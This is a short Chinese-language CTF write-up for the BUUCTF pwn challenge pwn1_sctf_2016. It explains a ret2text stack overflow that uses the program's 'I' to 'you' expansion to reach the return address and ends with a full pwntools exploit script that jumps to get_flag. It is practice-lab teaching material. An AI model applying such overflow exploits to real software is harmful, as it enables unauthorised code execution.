Buuctf 刷题笔记(PWN)(1)
pwn1_sctf_2016
1、先使用checksec检查安全选项、再用IDA进行反编译
找到get_flag() 那么这道题可能就是ret2text类型了,直接利用栈溢出到返回地址进行覆盖,进而执行get_flag()就可以了
vuln()函数将我们的输入字符串,对I进行转换,将一个I转换成了you
根据fgets可以知道输入值最长为32长度,而&s地址到返回地址的距离应该是3C+4 所以需要利用I->you的这个特性
fgets(&s, 32, edata);
所以构造的payload应该如下:'I'*20+'b'*4+get_flag_add
具体EXP如下:
from pwn import *
context.arch='i386'
context.log_level="debug"
p=process("./pwn1_sctf_2016")
#p=remote("node4.buuoj.cn",26033)
payload='I'*20+'b'*4
get_flag=0x8048f0d
payload+=p32(get_flag)
print(payload)
p.sendline(payload)
p.interactive()